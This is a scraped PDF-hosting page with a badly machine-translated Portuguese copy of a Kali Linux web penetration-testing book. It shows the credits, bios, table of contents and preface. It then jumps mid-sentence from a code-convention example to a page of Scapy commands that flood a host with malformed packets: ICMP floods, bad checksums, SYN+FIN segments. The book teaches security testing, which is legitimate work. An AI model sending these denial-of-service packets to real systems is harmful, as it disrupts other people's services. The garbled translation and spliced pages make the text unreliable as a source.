Web Penetration Testing With Kali Linux.en.Pt(1)

October 1, 2017 | Author: Raul Leite | Category: Vulnerability (Computing), Penetration Test, Server (Computing), Linux, World Wide Web
Share Embed Donate


Short Description

Download Web Penetration Testing With Kali Linux.en.Pt(1)...

Description

Teste de Invasão Web com Kali Linux

Um guia prático para a implementação de testes de penetração estratégias em sites, aplicações web e padrão protocolos da web com Kali Linux.

José Muniz Aamir Lakhani

BIRMINGHAM - MUMBAI

Teste de Invasão Web com Kali Linux Copyright © 2013 Packt Publishing

Todos os direitos reservados. Nenhuma parte deste livro pode ser reproduzida, armazenada em um sistema, ou transmitida de qualquer forma ou por qualquer meio, sem a prévia e por escrito permissão do editor, exceto no caso de breves citações embutidas em artigos ou críticas. Todo esforço foi feito na preparação deste livro para garantir a precisão das informações apresentadas. No entanto, a informação contida neste livro é vendido sem garantia, expressa ou implícita. Nem os autores, nem Packt Publishing, e os seus revendedores e distribuidores serão responsáveis por quaisquer danos causados ou supostamente causados direta ou indiretamente por este livro. Packt Publishing tem se esforçado para fornecer informações sobre marca registrada de todos os empresas e produtos mencionados neste livro através da utilização adequada de capitais. No entanto, Packt Publishing não pode garantir a precisão das informações.

Data de publicação: setembro 2013

Referência de Produção: 1180913

Publicado por Packt Publishing Ltd. Livery Lugar 35 Livery Rua Birmingham B3 2PB, Reino Unido. ISBN 978-1-78216-316-9 www.packtpub.com

Cubra Imagem por Karl Moore (karl.moore @ ukonline.co.uk)

[FM-2]

Créditos Autores

Coordenador do Projeto

José Muniz

Anugya Khurana

Aamir Lakhani Revisores Christopher Smith

Revisores Adrian Hayter

Clyde Jenkins

Danang Heriyadi Indexador

Tajinder Singh Kalsi

Monica Ajmera Mehta

Brian Sak Kunal Sehgal

Gráficos Nitin.K. Sookun (ISH)

Ronak Dhruv

Aquisição do Editor

Coordenador de Produção

Vinay Argekar

Aditi Gajjar

Editor Técnico chumbo

Capa Trabalho

Amey Varangaonkar

Aditi Gajjar

Editores Técnicos Pooja Arondekar Sampreshita Maheshwari Menza Mathew

[FM-3]

Sobre os autores José Muniz é um arquiteto de soluções técnicas e de segurança pesquisador. Ele começou sua carreira em desenvolvimento de software e redes depois gerida como um contratado recurso técnico. Joseph mudou-se para consultoria e descobriu uma paixão por segurança durante a reunião com uma variedade de clientes. Ele esteve envolvido com o projeto e implementação de vários projetos que vão desde empresas Fortune 500 para grandes redes federais. Joseph é executado TheSecurityBlogger.com site, um dos recursos mais populares sobre segurança e implementação do produto. Você também pode encontrar Joseph falando em eventos ao vivo , bem como com outras publicações envolvido. Os acontecimentos recentes incluem alto-falante for Social Mídia Deception na conferência ASIS Internacional de 2013, alto-falante para Eliminar Rede pontos cegos com webinar Data Center Segurança, alto-falante para fazer Trazer Seu próprio dispositivo (BYOD) Trabalhar no Solutions Forum Governo, Washington DC, e um artigo sobre a comprometer senhas em PenTest Magazine - Backtrack Compêndio, julho de 2013. Fora do trabalho, ele pode ser encontrado por trás de toca-discos de vinil arranhando clássico ou no o campo de futebol mexer com os clubes locais. Este livro não poderia ter sido feito sem o apoio da minha encantadora esposa Ning e inspirações criativas da minha filha Raylin. Eu também deve creditar a minha paixão por aprender a meu irmão Alex, que me criou junto com meus pais amorosos Irene e Ray. E eu gostaria de dar um agradecimento final que a todos os meus amigos, familiares e colegas que me apoiaram ao longo dos anos.

[FM-4]

Aamir Lakhani é uma das principais Cyber Security e Cyber Contra arquiteto. Ele é responsável pelo fornecimento de soluções de TI de segurança para grandes comercial e organizações empresariais federais. Lakhani lidera projetos que implementam posturas de segurança para empresas da Fortune 500, o Departamento de Defesa dos EUA, os principais provedores de saúde, instituições de ensino, e financeira e organizações de mídia. Lakhani projetou contra-ofensiva medidas de defesa para as agências de defesa e inteligência e organizações tem assistido em defender-se do ataque ativo de volta os ataques perpetrados por metro grupos cibernéticos. Lakhani é considerado um líder na indústria de apoio detalhado compromissos de arquitetura e projetos sobre tópicos relacionados à defesa cibernética, mobile ameaças de aplicação, malware e ameaças persistentes avançadas de pesquisa (APT), e Segurança das Trevas. Lakhani é o autor e colaborador de vários livros, e tem apareceu na National Public Radio como um especialista em Cyber Security.

Escrevendo sob o pseudônimo de Dr. Chaos, Lakhani também opera o DrChaos.com blogue. Em sua lista recente de 46 federais Tecnologia Peritos para Siga no Twitter, a Forbes revista descreveu Aamir Lakhani como "um blogueiro, especialista infosec, super-herói ... e todo bom homem. " Eu gostaria de dedicar este livro aos meus pais, e Mahmood Nasreen, e irmãs, e Noureen Zahra. Obrigado por sempre incentivando o pequeno hacker mim. Eu não poderia ter feito isso sem seu apoio. Obrigado mãe e pai por seus sacrifícios. Eu faria Também gosto também de agradecer aos meus amigos e colegas para o seu incontável encorajamento e orientação. Estou verdadeiramente abençoado para ser trabalhando com as pessoas mais inteligentes e mais dedicadas do mundo.

[FM-5]

Sobre os Revisores Adrian Hayter é um testador de penetração com mais de 10 anos de experiência em desenvolvimento e quebrar em aplicações web. Ele possui um Mestrado licenciatura em Segurança da Informação e uma licenciatura Formado em Ciência da Computação pela Royal Holloway, Universidade de Londres.

Danang Heriyadi é um pesquisador de segurança de computadores indonésia especializada em engenharia e software exploração reversa com mais de cinco anos mãos na experiência. Ele está atualmente trabalhando em Hatsecure como um instrutor para "Exploit avançada e Shellcode Desenvolvimento ". Como pesquisador, ele gosta de compartilhar o conhecimento de TI Segurança em seu blog em FuzzerByte (http://www.fuzzerbyte.com). Gostaria de agradecer aos meus pais por me dar vida, sem eles, eu não estaria aqui hoje, minha namorada para me apoiar cada dia com sorriso e amor, meus amigos, que eu não posso descrever um por um.

[FM-6]

Tajinder Singh Kalsi é o co-fundador e Chief Technical Evangelist em Virscent Technologies Pvt. Ltd, com mais de seis anos de experiência de trabalho na área de TI. Ele começou sua carreira com WIPRO como Associate Técnico, e mais tarde tornou-se Consultor cum instrutor de TI. A partir de agora, ele realiza seminários em faculdades em todo Índia, sobre temas, tais como a segurança da informação, desenvolvimento de aplicações Android, computing desenvolvimento de sites, e nuvem, e cobriu mais de 100 faculdades e cerca de 8500 estudantes, mais até agora. Além de treinamento, ele também mantém um blog (www.virscent.com / blog), Que bate em vários truques de hackers. Pegá-lo no facebook em-www.facebook.com / tajinder.kalsi.tj ou seguir o seu sítiowww.tajinderkalsi.com.

Gostaria especialmente de agradecer Krunal Rajawadha (Autor Executivo de Relacionamento na Packt Publishing) para vir através de mim através do meu blog e me oferecer esta oportunidade. Gostaria também de agradecer à minha família e amigos íntimos para me apoiar quando eu estava trabalhando neste projeto.

Brian Sak, CCIE # 14441, é atualmente um Arquiteto de Soluções Técnico da Cisco Sistemas, onde ele está envolvido no desenvolvimento de soluções e ajuda os parceiros da Cisco construir e melhorar os seus serviços de consultoria. Antes da Cisco, Brian realizada segurança serviços de consultoria e avaliação para grandes instituições financeiras, governo dos EUA organismos e empresas da Fortune 500. Ele tem quase 20 anos de indústria experiência com a maioria dos que passaram em Segurança da Informação. Além de inúmeras certificações de segurança e da indústria técnicas, Brian tem um mestrado em Segurança da Informação e Assurance, e é um contribuinte para o Centro de Internet Security e outros livros e publicações com foco em segurança.

[FM-7]

Kunal Sehgal (KunSeh.com) Entrou no setor de segurança de TI após a conclusão o curso de segurança do ciberespaço da faculdade da Geórgia (Canadá), e tem sido associado com organizações financeiras desde então. Isso não só lhe deu experiência em um lugar onde a segurança é crucial, mas também lhe forneceu valiosos conhecimentos especializados no campo. Atualmente, ele dirige está dirigindo as operações de TI de segurança, para a Região APAC de um dos maiores bancos europeus. No geral, ele tem cerca de 10 anos de experiência em diversas funções que vão desde a avaliação de vulnerabilidade, a governança de segurança e de avaliação de risco para monitoramento de segurança. Ele possui uma série de certificações para o seu nomear, incluindo própria OSCP do Backtrack, e outros, como TCNA, CISM, CCSK, Security +, roteador Cisco de Segurança, ISO 27001 LA, ITIL.

Nitin Sookun (MBCS) é um nerd apaixonado que residem no coração de Oceano Índico, na bela ilha de Maurício. Ele começou sua carreira de computação como empresário e fundou Indra Co. Ltd. Na busca de mais um desafio, ele entregou a gestão do negócio sobre a sua família e se juntou Linkbynet indiano Oceano Ltd como Engenheiro de sistema Unix / Linux. Ele é atualmente um engenheiro da Laranja Serviços às empresas. Nitin tem sido um defensor openSUSE desde 2009 e passa seu tempo livre evangelizando Linux e FOSS. Ele é um membro ativo de vários grupos de usuários e projetos de código aberto, entre elas openSUSE Project, MATE Project Desktop, Fundação Software Livre, Linux User Group de Maurício, eo Maurício Artesanato de software comunitário. Ele gosta de scripting em Bash, Perl, e Python, e geralmente publica seu trabalho sobre seu blog. Seu mais recente trabalho "Projeto Evil Genius" é um roteiro adaptado para porta / install Ferramentas de Teste de Invasão em openSUSE. Seus tutoriais são muitas vezes traduzidos para vários línguas e compartilhada dentro da comunidade open source. Nitin é um pensador livre e acredita em compartilhar conhecimento. Ele gosta de socializar com os profissionais de vários campos.

[FM-8]

www.PacktPub.com Arquivos de suporte, eBooks, ofertas de desconto e mais Você pode querer visitar www.PacktPub.com para os arquivos de suporte e downloads relacionados ao seu livro. Você sabia que Packt oferece versões e-book de todos os livros publicados, com PDF e arquivos disponíveis ePub? Você pode atualizar para a versão e-book em www.PacktPub. com e como um cliente livro impresso, você tem direito a um desconto na cópia eBook. Entre em contato com a gente no [email protected] para mais detalhes. Em www.PacktPub.com, Você também pode ler uma coleção de artigos técnicos gratuitos, sinal -se para uma série de boletins informativos gratuitos e receber descontos exclusivos e ofertas em Packt livros e eBooks. TM

http://PacktLib.PacktPub.com

Você precisa de soluções imediatas para suas perguntas de TI? PacktLib está online de Packt biblioteca de livros digitais. Aqui, você pode acessar, ler e pesquisar em toda Packt biblioteca de livros.

Por que assinar? •

Totalmente pesquisável através de cada livro publicado pela Packt



Copiar e colar, imprimir e conteúdo favorito



On demand e acessível via navegador

Acesso gratuito para os titulares de contas Packt Se você tiver uma conta com a Packt www.PacktPub.com, Você pode usar isso para o acesso PacktLib hoje e vista nove livros totalmente gratuitos. Basta usar suas credenciais de login para acesso imediato.

[FM-9]

Índice analítico Prefácio Capítulo 1: Teste de Invasão e Configuração Conceitos de testes de penetração de aplicativos Web Metodologia Teste de Invasão Calculando risco Conceitos Kali Testes de Penetração Passo 1 - Reconhecimento Etapa 2 - Avaliação Alvo Passo 3 - Exploração Passo 4 - Privilege Escalation Passo 5 - a manutenção de um ponto de apoio Apresentando Kali Linux Configuração do sistema Kali Correndo Kali Linux a partir de uma mídia externa Instalando Kali Linux Kali Linux e VM imagem primeira corrida Visão geral ferramentas Kali Resumo

Capítulo 2: Reconhecimento Objetivos de reconhecimento A pesquisa inicial Site da empresa Fontes de história Web Registros Regionais da Internet (RIRs) Eletrônico coleta de dados, análise e recuperação (EDGAR) Recursos de mídia social Confiança

1 7 8 9 14 17 17 18 19 19 20 21 21 21 22 29 29 31

33 34 34 35 36 39 40 41 41

Índice analítico

Postagens de emprego Localização Shodan Google hackers Google Hacking Banco de Dados Pesquisando redes

41 42 42 44 45 48

HTTrack - clonar um site Técnicas de reconhecimento de ICMP Técnicas de reconhecimento DNS Identificação do alvo DNS Gráficos de coleta de informações - Maltego

49 52 53 55 57

Nmap

59

FOCA - site metadados Reconnaissance

66

Resumo

72

Ataques do lado do servidor: Capítulo 3

73

A avaliação da vulnerabilidade Webshag Skipfish ProxyStrike Vega OWASP-Zap Websploit Exploração Metasploit w3af Explorando os sistemas de e-mail Ataques de força bruta Hidra DirBuster WebSlayer Cracking senhas John the Ripper Man-in-the-middle Tira SSL

74 74 78 81 85 89 95 96 96 102 105 107 107 110 113 119 119 121 122

Iniciando o ataque - redirecionamento Configurando o redirecionamento de porta usando o Iptables

Resumo

Ataques do lado do cliente: Capítulo 4

123 124

127

129

A engenharia social Engenharia Social Toolkit (SET) Usando SET para clonar e ataque

129 130 132

[Ii]

Índice analítico

MitM Proxy Hospedar digitalização Hospedar digitalização com Nessus

143 144 145

Instalando o Nessus em Kali Usando o Nessus

145 146

Obtenção e rachaduras senhas de usuários As senhas do Windows Montagem do Windows Senhas Linux

151 153 154 155

Kali quebra de senha ferramentas Johnny hashcat e oclHashcat samdump2 chntpw Ophcrack Crunch Outras ferramentas disponíveis no Kali Hash-identificador dictstat RainbowCrack (rcracki_mt) findmyhash phrasendrescher CmosPwd creddump Resumo

155 156 159 161 161 165 168 170 170 171 172 173 173 173 174 174

Autenticação Atacar: Capítulo 5

175

Atacar o gerenciamento de sessões Clickjacking Cookies de sessão Sequestro web Sessão de Ferramentas Web Plugins do Firefox Firesheep - Plugin do Firefox Web Developer - Plugin do Firefox Greasemonkey - Plugin do Firefox Biscoito Injector - Plugin do Firefox Os cookies Gestor + - Plugin do Firefox Biscoito Cadger Wireshark Hamster e Ferret Man-in-the-middle ataque dsniff e arpspoof

177 177 178 179 180 180 180 181 182 183 184 187 190 193 193

[Iii]

Índice analítico

Ettercap Emalhe SQL Injection SqlMap Cross-site scripting (XSS) Testando cross-site scripting Cookie de XSS roubo / sequestro Autenticação Outras ferramentas urlsnarf acccheck hexinject Patator DBPwAudit Resumo

Capítulo 6: Ataques Web

196 198 200 203 204 205 206 208 208 209 209 210 210 210

211

Exploração Navegador Quadro - Carne FoxyProxy - Plugin do Firefox BURP Proxy OWASP - ZAP Colheita senha SET Fimap Negação de Serviços (DoS) THC-SSL-DOS Scapy SlowLoris Low Orbit Ion Canhão Outras ferramentas DNSCHEF SniffJoke Cerco Inundator TCPReplay Resumo

211 216 218 225 230 234 235 236 238 240 242 245 245 246 247 248 248 249

Capítulo 7: contramedidas defensivas

251

Testando suas defesas Segurança da linha de base STIG O gerenciamento de patches As diretivas de senha

252 253 254 254 256

[Iv]

Índice analítico

Espelhe o seu ambiente HTTrack Outras ferramentas de clonagem Man-in-the-middle defesa Defesa tira SSL Negação de Serviço defesa Defesa de Cookies Defesa Clickjacking Forense digital Kali Forensics Bota

257 257 259 259 261 262 263 264 265 266

Análise do Sistema de Arquivos com Kali

267

dc3dd Outras ferramentas forenses em Kali

269 271

chkrootkit Autópsia Binwalk pdf-parser Principal Pasco Bisturi bulk_extractor

271 271 274 275 275 275 276 276

Resumo

276

Capítulo 8: Teste de Penetração Relatório Executivo Observância Os padrões da indústria Serviços profissionais Documentação Formato do relatório Capa Declaração de Confidencialidade Controle de documentos Timeline Resumo executivo Metodologia Procedimentos de teste detalhadas Resumo dos resultados Vulnerabilidades Considerações de rede e recomendações Apêndices Glossário

[V]

277 278 279 280 282 282 283 283 284 284 285 286 288 289 290 292 294 294

Índice analítico

Declaração de Trabalho (SOW) Teste de Invasão Externa Material adicional SOW Kali ferramentas de relatórios Dradis KeepNote Maltego CaseFile MagicTree CutyCapt Exemplos de relatórios Resumo

295 296 298 300 300 301 301 301 302 302 311

Índice

313

[Vi]

Prefácio Kali é um arsenal Teste de Invasão baseado no Debian Linux usado por segurança profissionais (e outros) para realizar avaliações de segurança. Kali oferece uma variedade de conjuntos de ferramentas personalizadas para identificar e explorar vulnerabilidades em sistemas. Este livro é escrito ferramentas de alavancagem disponíveis em Kali Linux liberados 13 de março, 2013, bem como outras aplicações de código aberto. Teste de Invasão Web com Kali Linux é projetado para ser um guia para profissionais Testadores de penetração que procuram incluir Kali em uma penetração de aplicações web noivado. Nosso objetivo é identificar a melhor ferramenta de Kali (s) para uma tarefa específica, fornecer detalhes sobre como usar o aplicativo (s), e oferecem exemplos do que informações poderia ser obtida para fins de com base em experiência de campo especialista relatório. Kali tem vários programas e utilitários, no entanto, este livro vai concentrar-se na ferramenta mais forte (s) para uma tarefa específica no momento da publicação. Os capítulos deste livro são divididos em tarefas utilizados na aplicação web do mundo real Teste de Invasão. Capítulo 1, testes de penetração e de instalação, fornece uma visão geral Testes de Penetração conceitos básicos, estratégias de serviços profissionais, fundo sobre o meio ambiente Kali Linux, ea criação de Kali para temas apresentados neste livro. Capítulos 2-6, abrangem vários aplicativos web conceitos de testes de penetração, incluindo exemplos de configuração e relatórios destinados a destacar temas abordados se pode realizar seu objetivo desejado. Capítulo 7, contramedidas defensivas, serve como uma fonte de reparação em sistemas vulnerável a ataques apresentados nos capítulos anteriores. Capítulo 8, Teste de Penetração Relatório Executivo, oferece relatórios melhores práticas e exemplos que podem servir como modelos para a construção de relatórios de nível executivo. O objetivo de projetar o livro em desta forma é dar ao leitor um guia para envolver uma penetração de aplicações web com a ferramenta melhor possível (s) disponível em Kali, oferecer medidas para remediar uma vulnerabilidade e fornecer dados capturados como poderia ser apresentada de uma forma profissional.

Prefácio

O que este livro cobre Capítulo 1, testes de penetração e de instalação, abrange os fundamentos da construção de uma prática profissional Teste de Invasão. Os tópicos incluem a diferenciação de um Teste de Penetração de outros serviços, descrição da metodologia e direcionamento aplicações web. Este capítulo também fornece passos utilizados para configurar uma Kali Ambiente Linux para tarefas abordados neste livro. Capítulo 2, Reconhecimento, fornece várias maneiras de coletar informações sobre um alvo. Os tópicos incluem ferramentas gratuitas populares destacando disponíveis na Internet como bem como a recolha de informação utilitários disponíveis em Kali Linux. Capítulo 3, os ataques lado do servidor, centra-se na identificação e exploração de vulnerabilidades em servidores web e aplicações. Ferramentas cobertos estão disponíveis em Kali ou outro aberto utilitários de origem. Capítulo 4, Ataques lado do cliente, alvos hospeda sistemas. Os tópicos incluem a engenharia social, explorando vulnerabilidades do sistema host e atacando as senhas, pois são os mais meio comum para proteger os sistemas host. Capítulo 5, Atacar de autenticação, analisa a forma como os usuários e dispositivos para autenticar web aplicações. Os tópicos incluem a segmentação do processo de gerenciamento de sessões de autenticação, comprometer a forma como os dados são armazenados em sistemas host, e man-in-the-middle ataque Capítulo 6, ataques na Web, explora como tirar proveito de servidores web e técnicas. Este capítulo também aborda brevemente em SQL e ataques Cross-Site Scripting. aplicações web que utilizam exploits de compromisso como a exploração de navegador, procuração ataques, e colheita de senha. Este capítulo abrange igualmente os métodos para interromper serviços utilizando técnicas de negação de serviço. Capítulo 7, contramedidas defensivas, fornece as melhores práticas para o seu endurecimento aplicações web e servidores. Os tópicos incluem linhas de base de segurança, gerenciamento de patches, políticas de senha, e defender-se contra os métodos de ataque abordados no anterior capítulos. Este capítulo também inclui uma seção forense focados, pois é importante para investigar adequadamente um ativo comprometido para evitar impacto negativo adicional. Capítulo 8, Penetração Teste Relatório Executivo, abrange as melhores práticas para o desenvolvimento de Penetração pós relatórios de serviço de teste profissionais. Os tópicos incluem uma visão geral de métodos para agregar valor ao seu produto final, a formatação do documento e os modelos que pode ser usado para construir relatórios profissionais.

[2]

Prefácio

O que você precisa para este livro Os leitores devem ter uma compreensão básica de aplicações web, networking conceitos e metodologia de testes de penetração. Este livro vai incluir detalhada exemplos de como executar um ataque usando ferramentas oferecidas em Kali Linux, bem como outras aplicações de código aberto. Não é necessário, mas benéfico ter experiência usando versões anteriores do Backtrack ou programas similares. Os requisitos de hardware para a construção de um ambiente de laboratório e criação da Kali Arsenal Linux são abordados em Capítulo 1, testes de penetração e de Instalação.

Que este livro é para O público-alvo deste livro são testadores de penetração profissionais ou outros olhando para maximizar Kali Linux para um Teste de Invasão do servidor web ou aplicação exercício. Se você está procurando identificar como realizar um teste de penetração contra aplicações web e achados a um cliente é uma forma profissional, em seguida, este livro é para você.

Convenções Neste livro, você vai encontrar uma série de estilos de texto que distinguem entre diferentes tipos de informação. Aqui estão alguns exemplos desses estilos, e um explicação do seu significado. Palavras de código no texto são apresentados da seguinte forma: "Por exemplo, você pode ligar para o perfil My First Scan ou qualquer outra coisa que você gostaria. " Um bloco de código é definido da seguinte forma: document.write (" L2 Comprimento enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", o DIH = 15L) / TCP (dport = "www"), iface = "eth0", count = 2000)

Comprimento Header Too Short enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", o DIH = 2L) / TCP (dport = "www"), iface = "eth0", count = 2000)

ICMP Flood enviar (IP (dst = "10.0.0.1") / ICMP (), iface = "eth0", count = 2000)

IP erro de checksum enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", chksum = 0x5500) / TCP (dport = "www"), iface = "eth0", count = 2000)

IP Fragment enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", frag = 1) / TCP (dport = "www"), iface = "eth0", count = 2000)

IP Comprimento> L2 Comprimento enviar (IP (dst = "10.0.0.1", src = "10.20.30.40", o DIH = 5L, len = 80) / TCP (dport = "www"), iface = "eth0", count = 2000)

Fonte endereço IP == Destination Address enviar (IP (dst = "10.0.0.1", src = "10.0.0.1") / TCP (dport = "www"), iface = "eth0", count = 2000)

[239]

Ataques na Web

L2 Comprimento >> IP Comprimento enviar (IP (dst = "10.0.0.1", len = 32) / Raw (load = "bla-bla-bla-bla-bla-blabla-bla "), iface =" eth0 ", count = 2000) enviar (IP (dst = "10.0.0.1", len = 32) / UDP (dport = 80, len = 48) / Raw (load = "Bla-bla-bla-bla-bla-bla-bla-bla"), iface = "eth0", count = 2000) enviar (IP (dst = "10.0.0.1", len = 32) / ICMP () / Raw (load = "bla-bla-bla-blabla-bla-bla-bla "), iface =" eth0 ", count = 2000)

No L4 enviar (IP (dst = "10.0.0.1", src = "10.20.30.40"), iface = "eth0," count = 2000)

SYN && FIN Set enviar (IP (dst = "10.0.0.1") / TCP (flags = "FS"), iface = "eth0", count = 2000)

TCP Header Length> L2 Comprimento enviar (IP (dst = "10.0.0.1", src = "10.20.30.40") / TCP (dport = "www", dataofs = 15L), iface = "eth0", count = 2000)

TCP Header Length Too Short (comprimento
View more...

Comments

Copyright ©2017 KUPDF Inc.
SUPPORT KUPDF